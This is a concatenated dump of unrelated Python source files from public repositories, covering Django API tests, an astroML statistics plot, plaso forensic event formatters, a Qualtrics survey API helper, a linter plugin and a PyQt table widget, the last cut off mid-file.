max_stars_repo_path | max_stars_repo_name | max_stars_count | id | content
---|---|---|---|---
src/python/errors.py | Miravalier/canonfire | 1 | 8500 |
class AuthError(Exception):
pass
class JsonError(Exception):
pass
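# Hedged usage sketch (added; not part of the original file): the two exception
# types above let callers distinguish authentication failures from malformed
# JSON request bodies.
import json

def parse_request(token, raw_body):
    if not token:
        raise AuthError("missing or invalid token")
    try:
        return json.loads(raw_body)
    except ValueError as exc:
        raise JsonError("request body is not valid JSON: {}".format(exc))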
vehicle/tests.py | COS301-SE-2020/ctrlintelligencecapstone | 0 | 8501 |
from rest_framework.test import APITestCase
from rest_framework.test import APIRequestFactory
import requests
import pytest
import json
from django.core.management import call_command
from django.db.models.signals import pre_save, post_save, pre_delete, post_delete, m2m_changed
from rest_framework.test import APIClient
# Create your tests here.
# @pytest.fixture(autouse=True)
# def django_db_setup(django_db_setup, django_db_blocker):
# signals = [pre_save, post_save, pre_delete, post_delete, m2m_changed]
# restore = {}
# with django_db_blocker.unblock():
# call_command("loaddata", "test_stuff.json")
def get_valid_token(client):
client = APIClient()
login_data = {
"username": "steve",
"password": "<PASSWORD>"
}
response = client.post('/api-auth/', data=login_data, format='json', headers={'Content-Type': 'application/json'})
assert response.status_code == 400
response.render()
response_string = response.content.decode("utf-8")
return json.loads(response_string).get("token")
@pytest.mark.django_db
def test_add_vehicle_basic(client):
url = '/api/v1/vehicle/add_vehicle_basic/'
data = {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
token = get_valid_token(client)
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token {}'.format(token))
response = client.post(url, data=data, format='json')
assert response.status_code == 401
@pytest.mark.django_db
def test_get_vehicle(client):
url = '/api/v1/vehicle/get_vehicle/'
data = {
'license_plate' : 'BE32SNGP'
}
response = client.post(url,data)
assert response.status_code == 401
@pytest.mark.django_db
def test_search(client):
url = '/api/v1/vehicle/search/'
data = {
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
response = client.post(url,data, format='json')
assert response.status_code == 401
@pytest.mark.django_db
def test_file_recognize(client):
import pathlib
url = '/api/v1/vehicle/file_recognize/'
# response = client.post(url,data)
path = pathlib.Path(__file__).parent.absolute()
actual_path ='{}/test_images/2015-BMW-320d-xDrive-Touring-test-drive-67.jpg'.format(path)
files = [
('file', open("{}".format(actual_path), 'rb'))
]
data = {
'file' : files[0]
}
response = client.post(url, data=data, files=files)
assert response.status_code == 401
@pytest.mark.django_db
def test_search_advanced_and(client):
url = '/api/v1/vehicle/search_advances/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_get_duplicates(client):
url = '/api/v1/vehicle/get_duplicates/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_saps_flagged(client):
url = '/api/v1/vehicle/get_saps_flagged/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_search_advanced_or(client):
url = '/api/v1/vehicle/search_advances/'
data = {
'type' : 'or',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
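# Hypothetical sketch (added; not part of the original file): every request above
# is sent without valid credentials, which is why these tests expect HTTP 400/401.
# With a real user seeded into the test database, an authenticated client could be
# built along these lines (the endpoint and credentials are assumptions):
@pytest.fixture
def auth_client(django_user_model):
    django_user_model.objects.create_user(username="steve", password="example-pass")
    client = APIClient()
    login = client.post('/api-auth/', data={"username": "steve", "password": "example-pass"}, format='json')
    token = login.json().get("token")
    client.credentials(HTTP_AUTHORIZATION='Token {}'.format(token))
    return client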
simple_exercises/lanesexercises/py_functions2/rep_ex3.py | ilante/programming_immanuela_englander | 0 | 8502 |
# 3. Define a function to check whether a number is even
def even(num):
if num%2 == 0:
return True
else:
return False
print(even(4))
print(even(-5))
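# Quick checks (added for illustration): Python's % operator returns a
# non-negative remainder for a positive modulus, so the parity test also
# behaves correctly for negative inputs.
assert even(10) is True
assert even(-5) is False
assert even(0) is True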
book_figures/chapter5/fig_posterior_cauchy.py | aragilar/astroML | 3 | 8503 |
"""
Posterior for Cauchy Distribution
---------------------------------
Figure 5.11
The solid lines show the posterior pdf :math:`p(\mu|{x_i},I)` (top-left panel)
and the posterior pdf :math:`p(\gamma|{x_i},I)` (top-right panel) for the
two-dimensional pdf from figure 5.10. The dashed lines show the distribution
of approximate estimates of :math:`\mu` and :math:`\gamma` based on the median
and interquartile range. The bottom panels show the corresponding cumulative
distributions.
"""
# Author: <NAME>
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
import numpy as np
from matplotlib import pyplot as plt
from scipy.stats import cauchy
from astroML.stats import median_sigmaG
from astroML.resample import bootstrap
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
def cauchy_logL(x, gamma, mu):
"""Equation 5.74: cauchy likelihood"""
x = np.asarray(x)
n = x.size
# expand x for broadcasting
shape = np.broadcast(gamma, mu).shape
x = x.reshape(x.shape + tuple([1 for s in shape]))
return ((n - 1) * np.log(gamma)
- np.sum(np.log(gamma ** 2 + (x - mu) ** 2), 0))
def estimate_mu_gamma(xi, axis=None):
"""Equation 3.54: Cauchy point estimates"""
q25, q50, q75 = np.percentile(xi, [25, 50, 75], axis=axis)
return q50, 0.5 * (q75 - q25)
#------------------------------------------------------------
# Draw a random sample from the cauchy distribution, and compute
# marginalized posteriors of mu and gamma
np.random.seed(44)
n = 10
mu_0 = 0
gamma_0 = 2
xi = cauchy(mu_0, gamma_0).rvs(n)
gamma = np.linspace(0.01, 5, 70)
dgamma = gamma[1] - gamma[0]
mu = np.linspace(-3, 3, 70)
dmu = mu[1] - mu[0]
likelihood = np.exp(cauchy_logL(xi, gamma[:, np.newaxis], mu))
pmu = likelihood.sum(0)
pmu /= pmu.sum() * dmu
pgamma = likelihood.sum(1)
pgamma /= pgamma.sum() * dgamma
#------------------------------------------------------------
# bootstrap estimate
mu_bins = np.linspace(-3, 3, 21)
gamma_bins = np.linspace(0, 5, 17)
mu_bootstrap, gamma_bootstrap = bootstrap(xi, 20000, estimate_mu_gamma,
kwargs=dict(axis=1), random_state=0)
#------------------------------------------------------------
# Plot results
fig = plt.figure(figsize=(5, 5))
fig.subplots_adjust(wspace=0.35, right=0.95,
hspace=0.2, top=0.95)
# first axes: mu posterior
ax1 = fig.add_subplot(221)
ax1.plot(mu, pmu, '-k')
ax1.hist(mu_bootstrap, mu_bins, normed=True,
histtype='step', color='b', linestyle='dashed')
ax1.set_xlabel(r'$\mu$')
ax1.set_ylabel(r'$p(\mu|x,I)$')
# second axes: mu cumulative posterior
ax2 = fig.add_subplot(223, sharex=ax1)
ax2.plot(mu, pmu.cumsum() * dmu, '-k')
ax2.hist(mu_bootstrap, mu_bins, normed=True, cumulative=True,
histtype='step', color='b', linestyle='dashed')
ax2.set_xlabel(r'$\mu$')
ax2.set_ylabel(r'$P(<\mu|x,I)$')
ax2.set_xlim(-3, 3)
# third axes: gamma posterior
ax3 = fig.add_subplot(222, sharey=ax1)
ax3.plot(gamma, pgamma, '-k')
ax3.hist(gamma_bootstrap, gamma_bins, normed=True,
histtype='step', color='b', linestyle='dashed')
ax3.set_xlabel(r'$\gamma$')
ax3.set_ylabel(r'$p(\gamma|x,I)$')
ax3.set_ylim(-0.05, 1.1)
# fourth axes: gamma cumulative posterior
ax4 = fig.add_subplot(224, sharex=ax3, sharey=ax2)
ax4.plot(gamma, pgamma.cumsum() * dgamma, '-k')
ax4.hist(gamma_bootstrap, gamma_bins, normed=True, cumulative=True,
histtype='step', color='b', linestyle='dashed')
ax4.set_xlabel(r'$\gamma$')
ax4.set_ylabel(r'$P(<\gamma|x,I)$')
ax4.set_ylim(-0.05, 1.1)
ax4.set_xlim(0, 4)
plt.show()
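# Optional sanity check (added for illustration): after the explicit
# normalization above, both marginal posteriors should integrate to ~1.
assert abs(pmu.sum() * dmu - 1.0) < 1e-6
assert abs(pgamma.sum() * dgamma - 1.0) < 1e-6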
plaso/formatters/file_system.py | SamuelePilleri/plaso | 0 | 8504 |
# -*- coding: utf-8 -*-
"""The file system stat event formatter."""
from __future__ import unicode_literals
from dfvfs.lib import definitions as dfvfs_definitions
from plaso.formatters import interface
from plaso.formatters import manager
from plaso.lib import errors
class FileStatEventFormatter(interface.ConditionalEventFormatter):
"""The file system stat event formatter."""
DATA_TYPE = 'fs:stat'
FORMAT_STRING_PIECES = [
'{display_name}',
'Type: {file_entry_type}',
'({unallocated})']
FORMAT_STRING_SHORT_PIECES = [
'{filename}']
SOURCE_SHORT = 'FILE'
# The numeric values are for backwards compatibility with plaso files
# generated with older versions of dfvfs.
_FILE_ENTRY_TYPES = {
1: 'device',
2: 'directory',
3: 'file',
4: 'link',
5: 'socket',
6: 'pipe',
dfvfs_definitions.FILE_ENTRY_TYPE_DEVICE: 'device',
dfvfs_definitions.FILE_ENTRY_TYPE_DIRECTORY: 'directory',
dfvfs_definitions.FILE_ENTRY_TYPE_FILE: 'file',
dfvfs_definitions.FILE_ENTRY_TYPE_LINK: 'link',
dfvfs_definitions.FILE_ENTRY_TYPE_SOCKET: 'socket',
dfvfs_definitions.FILE_ENTRY_TYPE_PIPE: 'pipe'}
# pylint: disable=unused-argument
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
file_entry_type = event_values.get('file_entry_type', None)
if file_entry_type is not None:
event_values['file_entry_type'] = self._FILE_ENTRY_TYPES.get(
file_entry_type, 'UNKNOWN')
# The usage of allocated is deprecated in favor of is_allocated but
# is kept here to be backwards compatible.
if (not event_values.get('allocated', False) and
not event_values.get('is_allocated', False)):
event_values['unallocated'] = 'unallocated'
return self._ConditionalFormatMessages(event_values)
def GetSources(self, event):
"""Determines the the short and long source for an event object.
Args:
event (EventObject): event.
Returns:
tuple(str, str): short and long source string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
file_system_type = getattr(event, 'file_system_type', 'UNKNOWN')
timestamp_desc = getattr(event, 'timestamp_desc', 'Time')
source_long = '{0:s} {1:s}'.format(file_system_type, timestamp_desc)
return self.SOURCE_SHORT, source_long
class NTFSFileStatEventFormatter(FileStatEventFormatter):
"""The NTFS file system stat event formatter."""
DATA_TYPE = 'fs:stat:ntfs'
FORMAT_STRING_PIECES = [
'{display_name}',
'File reference: {file_reference}',
'Attribute name: {attribute_name}',
'Name: {name}',
'Parent file reference: {parent_file_reference}',
'({unallocated})']
FORMAT_STRING_SHORT_PIECES = [
'{filename}',
'{file_reference}',
'{attribute_name}']
SOURCE_SHORT = 'FILE'
_ATTRIBUTE_NAMES = {
0x00000010: '$STANDARD_INFORMATION',
0x00000030: '$FILE_NAME'
}
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
attribute_type = event_values.get('attribute_type', 0)
event_values['attribute_name'] = self._ATTRIBUTE_NAMES.get(
attribute_type, 'UNKNOWN')
file_reference = event_values.get('file_reference', None)
if file_reference:
event_values['file_reference'] = '{0:d}-{1:d}'.format(
file_reference & 0xffffffffffff, file_reference >> 48)
parent_file_reference = event_values.get('parent_file_reference', None)
if parent_file_reference:
event_values['parent_file_reference'] = '{0:d}-{1:d}'.format(
parent_file_reference & 0xffffffffffff, parent_file_reference >> 48)
if not event_values.get('is_allocated', False):
event_values['unallocated'] = 'unallocated'
return self._ConditionalFormatMessages(event_values)
class NTFSUSNChangeEventFormatter(interface.ConditionalEventFormatter):
"""The NTFS USN change event formatter."""
DATA_TYPE = 'fs:ntfs:usn_change'
FORMAT_STRING_PIECES = [
'{filename}',
'File reference: {file_reference}',
'Parent file reference: {parent_file_reference}',
'Update source: {update_source}',
'Update reason: {update_reason}']
FORMAT_STRING_SHORT_PIECES = [
'{filename}',
'{file_reference}',
'{update_reason}']
SOURCE_SHORT = 'FILE'
_USN_REASON_FLAGS = {
0x00000001: 'USN_REASON_DATA_OVERWRITE',
0x00000002: 'USN_REASON_DATA_EXTEND',
0x00000004: 'USN_REASON_DATA_TRUNCATION',
0x00000010: 'USN_REASON_NAMED_DATA_OVERWRITE',
0x00000020: 'USN_REASON_NAMED_DATA_EXTEND',
0x00000040: 'USN_REASON_NAMED_DATA_TRUNCATION',
0x00000100: 'USN_REASON_FILE_CREATE',
0x00000200: 'USN_REASON_FILE_DELETE',
0x00000400: 'USN_REASON_EA_CHANGE',
0x00000800: 'USN_REASON_SECURITY_CHANGE',
0x00001000: 'USN_REASON_RENAME_OLD_NAME',
0x00002000: 'USN_REASON_RENAME_NEW_NAME',
0x00004000: 'USN_REASON_INDEXABLE_CHANGE',
0x00008000: 'USN_REASON_BASIC_INFO_CHANGE',
0x00010000: 'USN_REASON_HARD_LINK_CHANGE',
0x00020000: 'USN_REASON_COMPRESSION_CHANGE',
0x00040000: 'USN_REASON_ENCRYPTION_CHANGE',
0x00080000: 'USN_REASON_OBJECT_ID_CHANGE',
0x00100000: 'USN_REASON_REPARSE_POINT_CHANGE',
0x00200000: 'USN_REASON_STREAM_CHANGE',
0x00400000: 'USN_REASON_TRANSACTED_CHANGE',
0x80000000: 'USN_REASON_CLOSE'}
_USN_SOURCE_FLAGS = {
0x00000001: 'USN_SOURCE_DATA_MANAGEMENT',
0x00000002: 'USN_SOURCE_AUXILIARY_DATA',
0x00000004: 'USN_SOURCE_REPLICATION_MANAGEMENT'}
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
file_reference = event_values.get('file_reference', None)
if file_reference:
event_values['file_reference'] = '{0:d}-{1:d}'.format(
file_reference & 0xffffffffffff, file_reference >> 48)
parent_file_reference = event_values.get('parent_file_reference', None)
if parent_file_reference:
event_values['parent_file_reference'] = '{0:d}-{1:d}'.format(
parent_file_reference & 0xffffffffffff, parent_file_reference >> 48)
update_reason_flags = event_values.get('update_reason_flags', 0)
update_reasons = []
for bitmask, description in sorted(self._USN_REASON_FLAGS.items()):
if bitmask & update_reason_flags:
update_reasons.append(description)
event_values['update_reason'] = ', '.join(update_reasons)
update_source_flags = event_values.get('update_source_flags', 0)
update_sources = []
for bitmask, description in sorted(self._USN_SOURCE_FLAGS.items()):
if bitmask & update_source_flags:
update_sources.append(description)
event_values['update_source'] = ', '.join(update_sources)
return self._ConditionalFormatMessages(event_values)
manager.FormattersManager.RegisterFormatters([
FileStatEventFormatter, NTFSFileStatEventFormatter,
NTFSUSNChangeEventFormatter])
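# Illustration (added; not part of the original module): the USN change
# formatter decodes its reason bitmask by OR-testing every documented flag.
# For example, 0x80000102 combines DATA_EXTEND, FILE_CREATE and CLOSE.
if __name__ == '__main__':
    flags = 0x80000102
    names = [name for bit, name in sorted(
        NTFSUSNChangeEventFormatter._USN_REASON_FLAGS.items()) if bit & flags]
    print(', '.join(names))
    # -> USN_REASON_DATA_EXTEND, USN_REASON_FILE_CREATE, USN_REASON_CLOSE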
applications/serializers.py | junlegend/back-landing-career | 0 | 8505 |
from rest_framework import serializers
from applications.models import Application
class ApplicationSerializer(serializers.Serializer):
content = serializers.JSONField()
portfolio = serializers.FileField()
class ApplicationAdminSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ['content', 'user', 'status', 'created_at', 'updated_at', 'recruits']
class ApplicationAdminPatchSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ['status']
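# Hypothetical usage sketch (added; the instance and status value are assumptions):
# serializer = ApplicationAdminPatchSerializer(instance=application, data={"status": "reviewed"}, partial=True)
# if serializer.is_valid():
#     serializer.save()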
qualtrics_iat/qualtrics_tools.py | ycui1/QualtricsIAT | 0 | 8506 |
from pathlib import Path
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
# api_token = "<KEY>"
# brand_center = "mdanderson.co1"
# data_center = "iad1"
# headers = {"x-api-token": api_token}
class QualtricsTool:
"""Data model to manage Qualtrics-related tools
Parameters:
-----------
api_token: str, the API token for the user
data_center: str, the data center for the user
brand_center: str, the brand center for the user
"""
def __init__(self, api_token=None, data_center=None, brand_center=None):
self.api_token = api_token
self.data_center = data_center
self.brand_center = brand_center
@property
def api_headers(self):
"""The default API headers"""
return {"x-api-token": self.api_token}
@property
def base_url(self):
"""The default base URL"""
return f"https://{self.data_center}.qualtrics.com"
@property
def api_base_url(self):
"""The default base API URL"""
return f"{self.base_url}/API/v3"
def upload_images_api(self,
local_image_folder,
library_id,
creating_full_url=True,
qualtrics_folder=None,
filename_pattern="*"):
"""Upload images from the local folder to the Qualtrics server
:param local_image_folder: str, Path, the local folder containing the images
:param library_id: str, Qualtrics library ID number
:param creating_full_url: bool, whether to return full image URLs or just the image IDs
:param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images
:param filename_pattern: str, the glob pattern used to select the images for uploading
:return list[str], the list of image IDs or URLs
"""
upload_url = f"{self.api_base_url}/libraries/{library_id}/graphics"
image_urls = list()
for file in Path(local_image_folder).glob(filename_pattern):
file_type = Path(file).suffix[1:]  # file extension without the leading dot
if file_type not in ("png", "gif", "jpg", "jpeg"):
raise ValueError("Qualtrics only accepts PNG, GIF, and JPEG images.")
encoded_fields = {'file': (file.name, open(file, 'rb'), f'image/{file_type}')}
image_url_id = self._upload_image(encoded_fields, qualtrics_folder, upload_url, file, creating_full_url)
image_urls.append(image_url_id)
return image_urls
def upload_images_web(self,
image_files,
library_id,
creating_full_url,
qualtrics_folder,
image_type):
"""Upload images from the web app to the Qualtrics server
:param image_files: Bytes, the uploaded bytes data from the web app
:param library_id: str, Qualtrics library ID number
:param creating_full_url: bool, whether to return full image URLs or just the image IDs
:param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images
:param image_type: str, the image file type
:return list[str], the list of image IDs or URLs
"""
image_urls = list()
upload_url = f"{self.api_base_url}/libraries/{library_id}/graphics"
file_count_digit = len(str(len(image_files)))
for file_i, file in enumerate(image_files, start=1):
encoded_fields = {'file': (f"image{file_i:0>{file_count_digit}}.{image_type}", file, f'image/{image_type}')}
image_url_id = self._upload_image(encoded_fields, qualtrics_folder, upload_url, file, creating_full_url)
image_urls.append(image_url_id)
return image_urls
def _upload_image(self, encoded_fields, qualtrics_folder, upload_url, file, creating_full_url):
if qualtrics_folder:
encoded_fields['folder'] = qualtrics_folder
mp_encoder = MultipartEncoder(fields=encoded_fields)
post_request = requests.post(
upload_url,
data=mp_encoder,
headers={'Content-Type': mp_encoder.content_type, **self.api_headers}
)
try:
image_url_id = post_request.json()['result']['id']
except KeyError:
raise Exception(f"Failed to upload image {file.name}")
if creating_full_url:
image_url_id = f"{self.base_url}/ControlPanel/Graphic.php?IM={image_url_id}"
return image_url_id
def delete_images(self, library_id, image_url_ids):
"""Delete images from the specified library
:param library_id: str, the library ID number
:param image_url_ids: list[str], the image IDs or full URLs
:return dict, the deletion report"""
report = dict()
for image_url_id in image_url_ids:
if image_url_id.find("=") > 0:
image_url_id = image_url_id[image_url_id.index("=") + 1:]
url = f'{self.api_base_url}/libraries/{library_id}/graphics/{image_url_id}'
delete_response = requests.delete(url, headers=self.api_headers)
try:
http_status = delete_response.json()['meta']['httpStatus']
except KeyError:
raise Exception(f"Failed to delete image: {image_url_id}")
else:
report[image_url_id] = "Deleted" if http_status.startswith('200') else "Error"
return report
def create_survey(self, template_json):
"""Create the survey using the JSON template
:param template_json: str in the JSON format, the JSON file for the qsf file
:return str, the created Survey ID number
"""
upload_url = f"{self.api_base_url}/survey-definitions"
creation_response = requests.post(
upload_url,
json=template_json,
headers={**self.api_headers, "content-type": "application/json"}
)
try:
survey_id = creation_response.json()['result']['SurveyID']
except KeyError:
raise Exception("Couldn't create the survey. Please check the params.")
return survey_id
def delete_survey(self, survey_id):
"""Delete the survey
:param survey_id: str, the survey ID number
:return dict, the deletion report
"""
report = dict()
delete_url = f"{self.api_base_url}/survey-definitions/{survey_id}"
delete_response = requests.delete(delete_url, headers=self.api_headers)
try:
http_status = delete_response.json()['meta']['httpStatus']
except KeyError:
raise Exception(f"Failed to delete survey: {survey_id}")
else:
report[survey_id] = "Deleted" if http_status.startswith('200') else "Error"
return report
def export_responses(self, survey_id, file_format="csv", data_folder=None):
"""Export responses from the Qualtrics survey"""
download_url = f"{self.api_base_url}/surveys/{survey_id}/export-responses/"
download_payload = f'{{"format": "{file_format}"}}'
download_response = requests.post(
download_url,
data=download_payload,
headers={**self.api_headers, "content-type": "application/json"}
)
try:
progress_id = download_response.json()["result"]["progressId"]
file_id = self._monitor_progress(download_url, progress_id)
file_content = self._download_file(download_url, file_id)
except KeyError:
raise Exception("Can't download the responses. Please check the params.")
return file_content
def _monitor_progress(self, download_url, progress_id):
progress_status = "inProgress"
while progress_status != "complete" and progress_status != "failed":
progress_response = requests.get(download_url + progress_id, headers=self.api_headers)
progress_status = progress_response.json()["result"]["status"]
return progress_response.json()["result"]["fileId"]
def _download_file(self, download_url, file_id):
file_url = f"{download_url}/{file_id}/file"
file_response = requests.get(file_url, headers=self.api_headers, stream=True)
return file_response.content
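# Hypothetical usage sketch (added; not part of the original module). The token,
# data center, library ID and survey ID below are placeholders, and the export
# endpoint typically returns a ZIP archive containing the requested CSV.
if __name__ == '__main__':
    qt = QualtricsTool(api_token="YOUR-API-TOKEN", data_center="iad1", brand_center="yourbrand.co1")
    image_urls = qt.upload_images_api("./stimuli", library_id="UR_xxxxxxxxxxxxxxx", qualtrics_folder="IAT")
    print(image_urls)
    export_bytes = qt.export_responses("SV_xxxxxxxxxxxxxxx", file_format="csv")
    with open("responses_export.zip", "wb") as fh:
        fh.write(export_bytes)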
linter.py | dndrsn/SublimeLinter-contrib-cspell | 0 | 8507 |
from SublimeLinter.lint import Linter, STREAM_STDOUT
class CSpell(Linter):
cmd = 'cspell stdin'
defaults = {'selector': 'source'}
regex = r'^[^:]*:(?P<line>\d+):(?P<col>\d+) - (?P<message>.*)$'
error_stream = STREAM_STDOUT
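# Illustration (added; not part of the original plugin): the regex above parses
# cspell-style "<file>:<line>:<col> - <message>" output, e.g.:
if __name__ == '__main__':
    import re
    sample = "stdin.txt:3:10 - Unknown word (teh)"
    print(re.match(CSpell.regex, sample).groupdict())
    # -> {'line': '3', 'col': '10', 'message': 'Unknown word (teh)'}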
metal/gdb/__init__.py | cHemingway/test | 24 | 8508 |
from metal.gdb.metal_break import Breakpoint, MetalBreakpoint
from metal.gdb.exitcode import ExitBreakpoint
from metal.gdb.timeout import Timeout
from metal.gdb.newlib import NewlibBreakpoints
from metal.gdb.argv import ArgvBreakpoint
portfolio/gui/tabresults/righttable.py | timeerr/portfolio | 0 | 8509 |
#!/usr/bin/python3
from datetime import datetime
from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox
from PyQt5.QtGui import QCursor
from PyQt5.QtCore import Qt, pyqtSignal, QObject
from portfolio.db.fdbhandler import results, strategies, balances
def updatingdata(func):
"""
Decorator to flag self.updatingdata_flag whenever a function
that edits data without user intervention is being run
"""
def wrapper(self, *args, **kwargs):
self.updatingdata_flag = True
func(self, *args, **kwargs)
self.updatingdata_flag = False
return wrapper
class RightTable(QTableWidget):
"""
Table dynamically showing results
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Custom Menu
self.setContextMenuPolicy(Qt.CustomContextMenu)
self.customContextMenuRequested.connect(self.showMenu)
# A signal that will be emitted whenever a line is removed
self.lineremoved = LineRemoved()
# UI Tweaks
self.verticalHeader().hide()
self.setSortingEnabled(True)
self.setHorizontalHeaderLabels(
["id", self.tr("Date"), self.tr("Account"), self.tr("Strategy"), self.tr("Amount")])
# When edited, change the data on the database too
self.cellChanged.connect(self.changeCellOnDatabase)
# A flag to prevent changeCellOnDatabase execution when needed
self.updatingdata_flag = True
# Initialization: show all transactions
self.setData(datetime(1980, 1, 1), datetime.today(), "All", "All")
@updatingdata
def setData(self, startdate, enddate, strategy, account):
"""
Asks the database for results data within certain parameters,
then shows that data on the table
"""
# Clear table
self.clear()
self.setHorizontalHeaderLabels(
["id", self.tr("Date"), self.tr("Account"), self.tr("Strategy"), self.tr("Amount"), self.tr("Description")])
# Get desired data from db
results_to_show = results.get_results_from_query(
start_date=startdate, end_date=enddate, strategy=strategy, account=account)
# If the data is empty, we are done
if len(results_to_show) == 0:
self.setRowCount(0)
return
# Resize table
self.setRowCount(len(results_to_show))
self.setColumnCount(len(results_to_show[0]))
# Change content
for rownum, row in enumerate(results_to_show):
for colnum, data in enumerate(row):
item = QTableWidgetItem() # Item that will be inserted
if colnum == 0:
# Ids can't be editable
item.setFlags(Qt.ItemIsSelectable)
elif colnum == 1:
# Change format to display date better
data = datetime.fromtimestamp(data).strftime("%d-%m-%Y")
# Data is now formatted, we can write it on table
item.setData(0, data)
self.setItem(rownum, colnum, item)
def showMenu(self, event):
"""
Custom Menu to show when an item is right-clicked
Options:
- Remove Line: removes line from table and database
"""
menu = QMenu()
# Actions
remove_action = menu.addAction(self.tr("Remove Line"))
# Getting action selected by user
action = menu.exec_(QCursor.pos())
# Act accordingly
if action == remove_action:
self.removeSelection()
self.lineremoved.lineRemoved.emit()
@updatingdata
def removeSelection(self):
"""
Removes the entire row of every selected item,
and then does the same on the databse
"""
# Getting selected indexes, and their corresponding ids
# from the database
selected_indexes_table, selected_ids = [], []
for index in self.selectedIndexes():
index = index.row() # Row number
if index not in selected_indexes_table: # Avoid duplicates
selected_indexes_table.append(index)
selected_ids.append(int(self.item(index, 0).text()))
# Removing the rows from the table and the database
for index, id_db in zip(selected_indexes_table, selected_ids):
results.delete_result(id_db)
self.removeRow(index)
print("Removed rows with ids on db : ", selected_ids,
"\n & ids on table: ", selected_indexes_table)
def changeCellOnDatabase(self, row, column):
"""
When a Table Item is edited by the user,
we want to check if it fits the type
and edit it on the database too
"""
if self.updatingdata_flag is True:
return
# The data is being modified internally (not by the user)
# so no errors assumed
new_item = self.item(row, column)
new_item_data = new_item.text()
database_entry_id = self.item(row, 0).text()
previous_amount = results.getResultAmountById(
database_entry_id) # Useful for balance adjustments later
columnselected_name = self.horizontalHeaderItem(column).text()
# Depending on from which column the item is, we check the data
# proposed differently
# Check which part of the transaction has been edited, and accting accordingly
# -------------- id --------------------
if columnselected_name == self.tr("Id"):
# Ids can't be edited
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(self.tr("Ids can't be edited"))
error_mssg.exec_()
# -------------- Date --------------------
elif columnselected_name == self.tr("Date"):
# The new text has to be a date
try:
new_date = datetime.strptime(new_item_data, "%d-%m-%Y")
results.update_result(
database_entry_id, new_date=new_date.timestamp())
except ValueError:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("Has to be a date in format dd-mm-yyyy"))
error_mssg.exec_()
# Reset date to previous one
previous_date_timestamp = results.get_result_date_by_id(
database_entry_id)
previous_date_text = datetime.fromtimestamp(
previous_date_timestamp).strftime("%d-%m-%Y")
self.updatingdata_flag = True
new_item.setData(0, previous_date_text)
self.updatingdata_flag = False
# -------------- Account --------------------
elif columnselected_name == self.tr("Account"):
# The account has to be an existing one
all_accounts = [a[0] for a in balances.get_all_accounts()]
previous_account = results.get_result_account_by_id(
database_entry_id)
if new_item_data not in all_accounts:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("The account has to be an existing one. \nAdd it first manually"))
error_mssg.exec_()
# Reset strategy to previous one
self.updatingdata_flag = True
new_item.setData(0, previous_account)
self.updatingdata_flag = False
else:
# The data is good
# Change the result on the results table on the db
results.update_result(
